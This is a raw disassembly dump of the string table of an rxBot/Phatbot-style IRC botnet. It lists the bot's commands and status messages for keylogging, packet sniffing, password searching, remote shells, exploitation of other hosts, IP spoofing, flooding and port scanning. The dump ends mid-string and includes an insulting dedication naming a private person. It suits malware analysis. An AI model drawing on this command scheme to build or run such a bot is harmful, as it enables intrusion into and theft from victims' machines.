'c_p',0 ; DATA XREF: sub_401ACD+49EFo aC_part db 'c_part',0 ; DATA XREF: sub_401ACD+49D8o align 10h aC_j db 'c_j',0 ; DATA XREF: sub_401ACD+49C1o aC_join db 'c_join',0 ; DATA XREF: sub_401ACD+49AAo align 4 aC_n db 'c_n',0 ; DATA XREF: sub_401ACD+4993o aC_nick db 'c_nick',0 ; DATA XREF: sub_401ACD+497Co align 4 aC_m db 'c_m',0 ; DATA XREF: sub_401ACD+4965o aC_mode db 'c_mode',0 ; DATA XREF: sub_401ACD+494Eo align 4 aC_r db 'c_r',0 ; DATA XREF: sub_401ACD+4937o aC_raw db 'c_raw',0 ; DATA XREF: sub_401ACD+4920o align 10h aM: ; DATA XREF: sub_401ACD+4909o ; UPX0:00438348o ... unicode 0, <m>,0 aCy db 'cy',0 ; DATA XREF: sub_401ACD+48DBo align 4 aCycle db 'cycle',0 ; DATA XREF: sub_401ACD+48C4o align 10h aA: ; DATA XREF: sub_401ACD+48ADo ; UPX0:0043830Co unicode 0, <a>,0 aAction db 'action',0 ; DATA XREF: sub_401ACD+4896o align 4 aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_401ACD+4868o aAa db 'aa',0 ; DATA XREF: sub_401ACD+4851o align 4 aAddalias db 'addalias',0 ; DATA XREF: sub_401ACD+483Ao align 4 aKl db 'kl',0 ; DATA XREF: sub_401ACD+4823o align 4 aKilllog db 'killlog',0 ; DATA XREF: sub_401ACD+480Co aGh db 'gh',0 ; DATA XREF: sub_401ACD+47E3o align 4 aGethost db 'gethost',0 ; DATA XREF: sub_401ACD+47CEo aCap db 'cap',0 ; DATA XREF: sub_401ACD+47B9o aCapture db 'capture',0 ; DATA XREF: sub_401ACD+47A4o unk_42B428 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406266o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aCommandUnknown db '- Command unknown.',0 unk_42B444 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40625Co db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aNoMessageSpeci db '- No message specified.',0 align 4 aSend db 'send',0 ; DATA XREF: sub_401ACD+475Fo ; sub_409B13+5F0o align 10h unk_42B470 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40621Fo db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aUserListFailed db '- User list failed.',0 align 10h unk_42B490 db 2Dh ; - ; DATA XREF: sub_401ACD+4748o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aUserListComple db '- User list completed.',0 unk_42B4B0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406194o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aShareListFaile db '- Share list failed.',0 align 10h unk_42B4D0 db 2Dh ; - ; DATA XREF: sub_401ACD+46BDo db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aShareListCompl db '- Share list completed.',0 align 4 aShare db 'share',0 ; DATA XREF: sub_401ACD+466Fo align 4 aContinue db 'continue',0 ; DATA XREF: sub_401ACD+462Bo align 4 aPause db 'pause',0 ; DATA XREF: sub_401ACD+4611o align 10h aStop db 'stop',0 ; DATA XREF: sub_401ACD+45F7o align 4 unk_42B518 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4060B7o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aServiceListFai db '- Service list failed.',0 unk_42B538 db 2Dh ; - ; DATA XREF: sub_401ACD+45E0o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aServiceListCom db '- Service list completed.',0 align 4 aStart db 'start',0 ; DATA XREF: sub_401ACD+45AAo align 4 unk_42B564 db 2Dh ; - ; DATA XREF: sub_401ACD+4578o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 2 db 3 aFailedToLoadAd db '- Failed to load advapi32.dll or netapi32.dll.',0 aNet db 'net',0 ; DATA XREF: sub_401ACD+4554o dword_42B5A0 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401ACD+4549o aFailedToStartL db '- Failed to start logging thread, error: <%d>.',0 align 4 dword_42B5DC dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401ACD+44DAo aKeyLoggerActiv db '- Key logger active.',0 align 10h dword_42B600 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401ACD+4458o aAlreadyRunning db '- Already running.',0 align 10h dword_42B620 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401ACD:loc_405F0Fo aNoKeyLoggerThr db '- No key logger thread found.',0 align 4 dword_42B64C dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_401ACD+4438o aKeyLoggerStopp db '- Key logger stopped. (%d thread(s) stopped.)',0 align 4 aFile db 'file',0 ; DATA XREF: sub_401ACD+43F9o align 10h aKeylog db 'keylog',0 ; DATA XREF: sub_401ACD+43D7o align 4 dword_42B698 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD:loc_405E99o aNoThreadFound_ db '- No thread found.',0 align 4 dword_42B6B8 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+43C2o aServerStopped_ db '- Server stopped. (%d thread(s) stopped.)',0 align 10h dword_42B6F0 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+4392o aFailedToSta_16 db '- Failed to start server, error: <%d>.',0 align 4 dword_42B724 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+4345o aServerRunnin_0 db '- Server running on Port: 113.',0 align 10h dword_42B750 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_401ACD+4335o aAlreadyRunni_0 db '- Already running.',0 align 10h aIdent db 'ident',0 ; DATA XREF: sub_401ACD+4302o align 4 unk_42B778 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_405DC4o db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aNoPhatbotSniff db '- No Phatbot sniffer thread found.',0 unk_42B7A8 db 2Dh ; - ; DATA XREF: sub_401ACD+42EDo db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aPhatbotSniffer db '- Phatbot sniffer stopped. (%d thread(s) stopped.)',0 unk_42B7E8 db 2Dh ; - ; DATA XREF: sub_401ACD+42BDo db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aFailedToSta_17 db '- Failed to start sniffer thread, error: <%d>.',0 unk_42B824 db 2Dh ; - ; DATA XREF: sub_401ACD+424Eo db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aPhatbotPacketS db '- Phatbot packet sniffer active.',0 align 4 unk_42B854 db 2Dh ; - ; DATA XREF: sub_401ACD+41E7o db 3, 34h, 2 db 73h ; s db 6Eh, 69h, 66h db 66h ; f db 65h, 72h, 2 db 3 aAlreadyRunni_1 db '- Already running.',0 aSniffer db 'sniffer',0 ; DATA XREF: sub_401ACD+41B0o dword_42B87C dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD:loc_405C72o aNoCarnivoreThr db '- No Carnivore thread found.',0 align 4 dword_42B8A8 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+419Bo aCarnivoreStopp db '- Carnivore stopped. (%d thread(s) stopped.)',0 align 4 dword_42B8E4 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+416Bo aFailedToSta_18 db '- Failed to start sniffer thread, error: <%d>.',0 align 10h dword_42B920 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+40FCo aCarnivorePacke db '- Carnivore packet sniffer active.',0 align 10h dword_42B950 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_401ACD+4095o aAlreadyRunni_2 db '- Already running.',0 align 10h aOn db 'on',0 ; DATA XREF: sub_401ACD+4075o ; sub_401ACD+41C7o ... align 4 aPsniff db 'psniff',0 ; DATA XREF: sub_401ACD+405Eo align 4 aRf db 'rf',0 ; DATA XREF: sub_401ACD+4049o align 10h aReadfile db 'readfile',0 ; DATA XREF: sub_401ACD+4034o align 4 aCm db 'cm',0 ; DATA XREF: sub_401ACD+401Fo align 10h aCmd db 'cmd',0 ; DATA XREF: sub_401ACD+400Ao aMirc db 'mirc',0 ; DATA XREF: sub_401ACD+3FF5o align 4 aMirccmd db 'mirccmd',0 ; DATA XREF: sub_401ACD+3FE0o aV: ; DATA XREF: sub_401ACD+3FCBo ; UPX0:0043833Co ... unicode 0, <v>,0 aVisit db 'visit',0 ; DATA XREF: sub_401ACD+3FB6o align 10h aLi db 'li',0 ; DATA XREF: sub_401ACD+3FA1o align 4 aList db 'list',0 ; DATA XREF: sub_401ACD+3F8Co align 4 aGt db 'gt',0 ; DATA XREF: sub_401ACD+3F77o align 10h aDel db 'del',0 ; DATA XREF: sub_401ACD+3F4Do aDelete db 'delete',0 ; DATA XREF: sub_401ACD+3F38o ; sub_401ACD+4645o align 4 aKi db 'ki',0 ; DATA XREF: sub_401ACD+3F23o align 10h aKill db 'kill',0 ; DATA XREF: sub_401ACD+3F0Eo align 4 aKp db 'kp',0 ; DATA XREF: sub_401ACD+3EF9o align 4 aKillproc db 'killproc',0 ; DATA XREF: sub_401ACD+3EE4o align 4 aDn db 'dn',0 ; DATA XREF: sub_401ACD+3ECFo align 4 aDns db 'dns',0 ; DATA XREF: sub_401ACD+3EBAo aSe db 'se',0 ; DATA XREF: sub_401ACD+3EA5o align 4 aO: ; DATA XREF: sub_401ACD+3E7Bo ; UPX0:0043866Co unicode 0, <o>,0 aOpen db 'open',0 ; DATA XREF: sub_401ACD+3E66o ; sub_401ACD+590Co ... align 10h aPr db 'pr',0 ; DATA XREF: sub_401ACD+3E51o align 4 aPrefix db 'prefix',0 ; DATA XREF: sub_401ACD+3E3Co align 4 aC_rn db 'c_rn',0 ; DATA XREF: sub_401ACD+3E27o align 4 aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_401ACD+3E12o align 10h aC_q db 'c_q',0 ; DATA XREF: sub_401ACD+3DFDo aC_quit db 'c_quit',0 ; DATA XREF: sub_401ACD+3DE8o align 4 aK: ; DATA XREF: sub_401ACD+3DD3o ; UPX0:00438328o ... unicode 0, <k>,0 aKillthread db 'killthread',0 ; DATA XREF: sub_401ACD+3DBEo align 4 aRaw db 'raw',0 ; DATA XREF: sub_401ACD+3D94o aPt db 'pt',0 ; DATA XREF: sub_401ACD+3D7Fo align 4 aJ: ; DATA XREF: sub_401ACD+3D55o ; UPX0:00438324o ... unicode 0, <j>,0 aN: ; DATA XREF: sub_401ACD+3D2Bo ; UPX0:00438344o ... unicode 0, <n>,0 unk_42BA4C db 2Dh ; - ; DATA XREF: sub_401ACD+3CF7o db 3, 34h, 2 db 69h ; i db 72h, 63h, 66h db 75h ; u db 63h, 6Bh, 2 db 3 aDisconnectingC db '- disconnecting clones...',0 align 4 aNickservRegist db 'nickserv register %s %s',0 ; DATA XREF: sub_401ACD+3C93o aRegister db 'register',0 ; DATA XREF: sub_401ACD+3C6Ao align 4 aPrivmsgSS_0 db 'PRIVMSG %s :%s',0 ; DATA XREF: sub_401ACD+3C11o align 4 aMix db 'mix',0 ; DATA XREF: sub_401ACD+3B44o dword_42BAAC dd 56495250h, 2047534Dh, 3A207325h, 6E696601h, 1726567h ; DATA XREF: sub_401ACD+3AF0o ; sub_401ACD+3B27o dd 0 dword_42BAC4 dd 56495250h, 2047534Dh, 3A207325h, 72657601h, 6E6F6973h ; DATA XREF: sub_401ACD+3AB9o dd 1 dword_42BADC dd 56495250h, 2047534Dh, 3A207325h, 6E697001h, 167h ; DATA XREF: sub_401ACD+3A82o ; sub_401ACD+3B99o aCtcp db 'ctcp',0 ; DATA XREF: sub_401ACD+3A2Do align 4 aNoticeSS_0 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401ACD+3998o ; sub_401ACD+39D4o ... align 4 aNotice_0 db 'notice',0 ; DATA XREF: sub_401ACD+393Eo align 10h aMsg db 'msg',0 ; DATA XREF: sub_401ACD+384Fo aChgnick db 'chgnick',0 ; DATA XREF: sub_401ACD+3808o aNick_0 db 'nick',0 ; DATA XREF: sub_401ACD+3706o ; sub_401ACD+3D16o align 4 dword_42BB24 dd 56495250h, 2047534Dh, 3A207325h, 43434401h, 4E455320h ; DATA XREF: sub_401ACD+36E9o dd 64252044h, 2064252Eh, 25206425h, 64252064h, 1 dword_42BB4C dd 636364h ; DATA XREF: sub_401ACD+366Co dword_42BB50 dd 6E696F6Ah, 7261702Fh, 74h ; DATA XREF: sub_401ACD+351Fo dword_42BB5C dd 4B43494Eh, 732520h ; DATA XREF: sub_401ACD+3502o ; sub_401ACD+3763o ... dword_42BB64 dd 69257325h, 0 ; DATA XREF: sub_401ACD+34E7o ; sub_40ACB6+4Fo ... aPnick db 'pnick',0 ; DATA XREF: sub_401ACD+34A6o align 4 aPartSS db 'part %s %s',0 ; DATA XREF: sub_401ACD+3489o ; sub_401ACD+3579o ... align 10h aPartflood db 'partflood',0 ; DATA XREF: sub_401ACD+3462o align 4 aPartS db 'part %s',0 ; DATA XREF: sub_401ACD+3445o aPart_0 db 'part',0 ; DATA XREF: sub_401ACD+3423o ; sub_401ACD+3D6Ao align 4 aJoinS db 'join %s',0 ; DATA XREF: sub_401ACD+3406o ; sub_401ACD+354Do ... aJoin db 'join',0 ; DATA XREF: sub_401ACD+33E4o ; sub_401ACD+3D40o align 4 aModeSS db 'mode %s %s',0 ; DATA XREF: sub_401ACD+33C7o align 4 aMode db 'mode',0 ; DATA XREF: sub_401ACD+3378o ; sub_401ACD+48F2o align 10h aNoticeSS_1 db 'notice %s :%s',0 ; DATA XREF: sub_401ACD+335Bo align 10h aNt db 'nt',0 ; DATA XREF: sub_401ACD+330Co align 4 dword_42BBD4 dd 76697270h, 2067736Dh, 3A207325h, 1732501h, 0 ; DATA XREF: sub_401ACD+32EFo dword_42BBE8 dd 7463h ; DATA XREF: sub_401ACD+32A0o dword_42BBEC dd 76697270h, 2067736Dh, 3A207325h, 7325h ; DATA XREF: sub_401ACD+3283o ; sub_401ACD+38A9o ... dword_42BBFC dd 5Fh ; DATA XREF: sub_401ACD+3254o ; sub_401ACD+32C0o ... dword_42BC00 dd 6D70h ; DATA XREF: sub_401ACD+3234o ; sub_401ACD+487Fo unk_42BC04 db 2Dh ; - ; DATA XREF: sub_401ACD+3202o db 3, 34h, 2 db 69h ; i db 72h, 63h, 66h db 75h ; u db 63h, 6Bh, 2 db 3 aSClonesLoadedT db '- %s clones loaded to %s:%s',0 align 10h aLoad db 'load',0 ; DATA XREF: sub_401ACD+31ABo align 4 aFlood db 'flood',0 ; DATA XREF: sub_401ACD+3182o align 10h aRinms db 'rinms',0 ; DATA XREF: sub_401ACD+316Bo align 4 aReconnect_in_m db 'reconnect.in.ms',0 ; DATA XREF: sub_401ACD+3156o aRin db 'rin',0 ; DATA XREF: sub_401ACD+3141o aReconnect_in db 'reconnect.in',0 ; DATA XREF: sub_401ACD+312Co align 4 unk_42BC6C db 2Dh ; - ; DATA XREF: sub_401ACD+3121o db 3, 34h, 2 db 65h ; e db 78h, 70h, 6Ch db 6Fh ; o db 69h, 74h, 2 db 3 aFailedToStartE db '- Failed to start exploiter thread, error: <%d>.',0 align 4 unk_42BCAC db 2Dh ; - ; DATA XREF: sub_401ACD+30AFo db 3, 34h, 2 db 65h ; e db 78h, 70h, 6Ch db 6Fh ; o db 69h, 74h, 2 db 3 aAttemptingToCo db '- attempting to compromise %s...',0 align 4 aExploit db 'exploit',0 ; DATA XREF: sub_401ACD+3029o unk_42BCE4 db 2Dh ; - ; DATA XREF: sub_401ACD+300Fo db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 73h db 70h ; p db 2 dup(6Fh), 66h db 29h ; ) db 2, 3, 2Dh aSpoofIpSetToS_ db ' Spoof IP set to ',27h,'%s',27h,'.',0 align 10h unk_42BD10 db 2Dh ; - ; DATA XREF: sub_401ACD+2FF1o db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 73h db 70h ; p db 2 dup(6Fh), 66h db 29h ; ) db 2, 3, 2Dh aSIsAnInvalidIp db ' ',27h,'%s',27h,' is an invalid IP address.',0 aD_D_D_ db '%d.%d.%d.*',0 ; DATA XREF: sub_401ACD+2FCDo align 10h unk_42BD50 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_404A41o db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 73h db 70h ; p db 2 dup(6Fh), 66h db 29h ; ) db 2, 3, 2Dh aSpoofingCurren db ' Spoofing currently set to ',27h,'%s',27h,'.',0 align 4 aGet db 'get',0 ; DATA XREF: sub_401ACD:loc_404A23o ; sub_401ACD+3F62o unk_42BD8C db 2Dh ; - ; DATA XREF: sub_401ACD+2EDBo db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aInvalidLoginSl db 'Invalid login slot number: %d.',0 align 4 unk_42BDB8 db 2Dh ; - ; DATA XREF: sub_401ACD+2ED3o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aNoUserLoggedIn db 'No user logged in at slot: %d.',0 align 4 dword_42BDE4 dd 234032Dh, 6E69616Dh, 202D0302h, 7325h ; DATA XREF: sub_401ACD+2E7Eo unk_42BDF4 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40493Co db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aThisModOfRxbot db 'This mod of rxBot is dedicated to Pia Gerhardt (nameless@efnet/ir' db 'cnet), the Beautiful Operatress from Heaven (or Bitch Operatress ' db 'from Hell?) who I love so much.',0 align 4 dword_42BEA4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_401ACD+2E4Co aFailedToSta_19 db '- Failed to start secure thread, error: <%d>.',0 align 10h dword_42BEE0 dd 234032Dh, 75636573h, 3026572h, 7325202Dh, 73797320h ; DATA XREF: sub_401ACD+2DD2o dd 2E6D6574h, 0 aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_401ACD+2DCCo align 4 aSecuring db 'Securing',0 ; DATA XREF: sub_401ACD+2DC5o align 4 unk_42BF14 db 2Dh ; - ; DATA XREF: sub_401ACD+2D4Eo db 3, 34h, 2 db 62h ; b db 69h, 6Eh, 64h db 73h ; s db 68h, 65h, 6Ch db 6Ch ; l db 2, 3, 2Dh aFailedToSta_20 db ' Failed to start server thread, error: <%d>.',0 align 4 unk_42BF54 db 2Dh ; - ; DATA XREF: sub_401ACD+2CCAo db 3, 34h, 2 db 62h ; b db 69h, 6Eh, 64h db 73h ; s db 68h, 65h, 6Ch db 6Ch ; l db 2, 3, 2Dh aServerStartedO db ' Server started on: %s:%d.',0 align 10h dword_42BF80 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401ACD+2C48o aFailedToSta_21 db '- Failed to start server thread, error: <%d>.',0 align 4 dword_42BFBC dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401ACD+2BD9o ; sub_4111CE+A8o aServerStarte_0 db '- Server started on: %s:%d.',0 dword_42BFE4 dd 234032Dh, 646E6966h, 656C6966h, 2D0302h ; DATA XREF: sub_401ACD+2B26o dword_42BFF4 dd 646E6946h, 6C696620h, 65h ; DATA XREF: sub_401ACD+2B21o dword_42C000 dd 234032Dh, 636F7270h, 2D030273h, 0 ; DATA XREF: sub_401ACD+2B0Eo dword_42C010 dd 636F7250h, 20737365h, 7473696Ch, 0 ; DATA XREF: sub_401ACD+2B09o dword_42C020 dd 234032Dh, 6E69616Dh, 202D0302h, 6F636552h, 63656E6Eh ; DATA XREF: sub_401ACD+2A96o dd 676E6974h, 2Eh aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_404556o ; sub_401ACD:loc_409779o ... align 4 dword_42C054 dd 234032Dh, 6E69616Dh, 202D0302h, 63736944h, 656E6E6Fh ; DATA XREF: sub_401ACD+2A74o dd 6E697463h, 2E67h aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_404534o align 4 aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_40451Eo ; sub_401ACD+7A7Fo align 4 aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+2A3Fo align 4 unk_42C0A4 db 2Dh ; - ; DATA XREF: sub_401ACD+2A18o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aStatusReady_Bo db 'Status: Ready. Bot Uptime: %s.',0 align 10h dword_42C0D0 dd 234032Dh, 6E69616Dh, 202D0302h, 20746F42h, 203A4449h ; DATA XREF: sub_401ACD+29D9o dd 2E7325h unk_42C0E8 db 2Dh ; - ; DATA XREF: sub_401ACD+29CAo db 3, 34h, 2 db 74h ; t db 68h, 72h, 65h db 61h ; a db 64h, 73h, 2 db 3 aFailedToSta_22 db '- Failed to start list thread, error: <%d>.',0 align 4 dword_42C124 dd 234032Dh, 65726874h, 2736461h, 4C202D03h, 20747369h ; DATA XREF: sub_401ACD+295Bo dd 65726874h, 2E736461h, 0 dword_42C144 dd 627573h ; DATA XREF: sub_401ACD+2935o dword_42C148 dd 234032Dh, 6E69616Dh, 202D0302h, 61696C41h, 696C2073h ; DATA XREF: sub_401ACD+28E3o dd 2E7473h unk_42C160 db 2Dh ; - ; DATA XREF: sub_401ACD+28C8o db 3, 34h, 2 db 6Ch ; l db 6Fh, 67h, 2 db 3 aFailedToSta_23 db '- Failed to start listing thread, error: <%d>.',0 dword_42C198 dd 234032Dh, 2676F6Ch, 4C202D03h, 69747369h, 6C20676Eh ; DATA XREF: sub_401ACD+2859o dd 2E676Fh dword_42C1B0 dd 234032Dh, 6E69616Dh, 202D0302h, 7774654Eh, 206B726Fh ; DATA XREF: sub_401ACD+27B4o dd 6F666E49h, 2Eh dword_42C1CC dd 234032Dh, 6E69616Dh, 202D0302h, 74737953h, 49206D65h ; DATA XREF: sub_401ACD+2785o dd 2E6F666Eh, 0 dword_42C1E8 dd 234032Dh, 6E69616Dh, 202D0302h, 6F6D6552h, 676E6976h ; DATA XREF: sub_401ACD+2730o dd 746F4220h, 2Eh unk_42C204 db 2Dh ; - ; DATA XREF: sub_401ACD+2714o db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 2, 3, 2Dh aFailedToSta_24 db ' Failed to start listing thread, error: <%d>.',0 align 10h dword_42C240 dd 234032Dh, 636F7270h, 2D030273h, 6F725020h, 73656363h ; DATA XREF: sub_401ACD+269Fo dd 696C2073h, 2E7473h aFull db 'full',0 ; DATA XREF: sub_401ACD+267Fo align 4 unk_42C264 db 2Dh ; - ; DATA XREF: sub_401ACD+261Do db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 2, 3, 2Dh aAlreadyRunni_3 db ' Already running.',0 align 4 dword_42C284 dd 234032Dh, 656B6463h, 3027379h ; DATA XREF: sub_401ACD+25FAo aSearchComplete db '- Search completed.',0 dword_42C2A4 dd 234032Dh, 6E69616Dh, 202D0302h, 69747055h, 203A656Dh ; DATA XREF: sub_401ACD+25AEo dd 2E7325h unk_42C2BC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403FEBo db 3, 34h, 2 db 63h ; c db 6Dh, 64h, 2 db 3 aRemoteShellRea db '- Remote shell ready.',0 align 4 unk_42C2DC db 2Dh ; - ; DATA XREF: sub_401ACD+2514o db 3, 34h, 2 db 63h ; c db 6Dh, 64h, 2 db 3 aCouldnTOpenRem db '- Couldn',27h,'t open remote shell.',0 align 4 unk_42C304 db 2Dh ; - ; DATA XREF: sub_401ACD+24F5o db 3, 34h, 2 db 63h ; c db 6Dh, 64h, 2 db 3 aRemoteShellAlr db '- Remote shell already running.',0 align 10h dword_42C330 dd 234032Dh, 6E69616Dh, 202D0302h, 20746547h, 70696C43h ; DATA XREF: sub_401ACD+24DFo dd 72616F62h, 2E64h dword_42C34C dd 234032Dh, 70696C63h, 72616F62h, 61642064h, 3026174h ; DATA XREF: sub_401ACD+24B1o dd 2Dh unk_42C364 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403F6Eo db 3, 34h, 2 db 66h ; f db 6Ch, 75h, 73h db 68h ; h db 64h, 6Eh, 73h db 2 db 3, 2Dh, 20h aFailedToFlushA db 'Failed to flush ARP cache.',0 align 10h unk_42C390 db 2Dh ; - ; DATA XREF: sub_401ACD+249Ao db 3, 34h, 2 db 66h ; f db 6Ch, 75h, 73h db 68h ; h db 64h, 6Eh, 73h db 2 db 3, 2Dh, 20h aArpCacheFlushe db 'ARP cache flushed.',0 align 4 unk_42C3B4 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403F43o db 3, 34h, 2 db 66h ; f db 6Ch, 75h, 73h db 68h ; h db 64h, 6Eh, 73h db 2 db 3, 2Dh, 20h aFailedToLoadDn db 'Failed to load dnsapi.dll.',0 align 10h unk_42C3E0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403F3Co db 3, 34h, 2 db 66h ; f db 6Ch, 75h, 73h db 68h ; h db 64h, 6Eh, 73h db 2 db 3, 2Dh, 20h aFailedToFlushD db 'Failed to flush DNS cache.',0 align 4 unk_42C40C db 2Dh ; - ; DATA XREF: sub_401ACD+2468o db 3, 34h, 2 db 66h ; f db 6Ch, 75h, 73h db 68h ; h db 64h, 6Eh, 73h db 2 db 3, 2Dh, 20h aDnsCacheFlushe db 'DNS cache flushed.',0 align 10h unk_42C430 db 2Dh ; - ; DATA XREF: sub_401ACD+2415o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aFailedToSta_25 db '- Failed to start server thread, error: <%d>.',0 align 4 unk_42C46C db 2Dh ; - ; DATA XREF: sub_401ACD+23A6o db 3, 34h, 2 db 72h ; r db 6Ch, 6Fh, 67h db 69h ; i db 6Eh, 64h, 2 db 3 aServerListenin db '- Server listening on IP: %s:%d, Username: %s.',0 unk_42C4A8 db 2Dh ; - ; DATA XREF: sub_401ACD+22C0o db 3, 34h, 2 db 68h ; h db 2 dup(74h), 70h db 64h ; d db 2, 3, 2Dh aFailedToSta_26 db ' Failed to start server thread, error: <%d>.',0 align 4 unk_42C4E4 db 2Dh ; - ; DATA XREF: sub_401ACD+2255o ; sub_40BACE+449o db 3, 34h, 2 db 68h ; h db 2 dup(74h), 70h db 64h ; d db 2, 3, 2Dh aServerListen_0 db ' Server listening on IP: %s:%d, Directory: %s\.',0 unk_42C520 db 2Dh ; - ; DATA XREF: sub_401ACD+214Eo db 3, 34h, 2 db 74h ; t db 66h, 74h, 70h db 64h ; d db 2, 3, 2Dh aFailedToSta_27 db ' Failed to start server thread, error: <%d>.',0 align 4 unk_42C55C db 2Dh ; - ; DATA XREF: sub_401ACD+20DFo ; sub_40BACE+DAo db 3, 34h, 2 db 74h ; t db 66h, 74h, 70h db 64h ; d db 2, 3, 2Dh aServerStarte_1 db ' Server started on Port: %d, File: %s.',0 align 10h unk_42C590 db 2Dh ; - ; DATA XREF: sub_401ACD+202Ao db 3, 34h, 2 db 74h ; t db 66h, 74h, 70h db 64h ; d db 2, 3, 2Dh aAlreadyRunni_4 db ' Already running.',0 align 10h unk_42C5B0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403AE1o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 61h ; a db 2 dup(6Ch), 2 db 3 aFailedToSta_28 db '- Failed to start scan, port is invalid.',0 align 4 unk_42C5E8 db 2Dh ; - ; DATA XREF: sub_401ACD+1FC4o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 61h ; a db 2 dup(6Ch), 2 db 3 aFailedToSta_29 db '- Failed to start scan thread, error: <%d>.',0 align 4 unk_42C624 db 2Dh ; - ; DATA XREF: sub_401ACD+1F53o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 61h ; a db 2 dup(6Ch), 2 db 3 aSPortScanSta_0 db '- %s Port Scan started on %s:%d with a delay of %d seconds for %d' db ' minutes using %d threads.',0 align 10h aSequential db 'Sequential',0 ; DATA XREF: sub_401ACD+1F28o ; sub_401ACD+5BEFo align 4 aRandom db 'Random',0 ; DATA XREF: sub_401ACD+1F21o ; sub_401ACD+5BE8o align 4 unk_42C6A4 db 2Dh ; - ; DATA XREF: sub_401ACD+1D6Eo db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 61h ; a db 2 dup(6Ch), 2 db 3 aAlreadyDScan_0 db '- Already %d scanning threads. Too many specified.',0 unk_42C6E4 db 2Dh ; - ; DATA XREF: sub_401ACD+1D10o db 3, 34h, 2 db 66h ; f db 69h, 6Eh, 64h db 70h ; p db 61h, 2 dup(73h) db 2 db 3, 2Dh, 20h aFailedToSta_30 db 'Failed to start search thread, error: <%d>.',0 unk_42C720 db 2Dh ; - ; DATA XREF: sub_401ACD+1C96o db 3, 34h, 2 db 66h ; f db 69h, 6Eh, 64h db 70h ; p db 61h, 2 dup(73h) db 2 db 3, 2Dh, 20h aSearchingForPa db 'Searching for password.',0 aFp db 'fp',0 ; DATA XREF: sub_401ACD+1C4Do align 4 aFindpass db 'findpass',0 ; DATA XREF: sub_401ACD+1C3Co align 4 aNoticeSPhoning db 'NOTICE %s 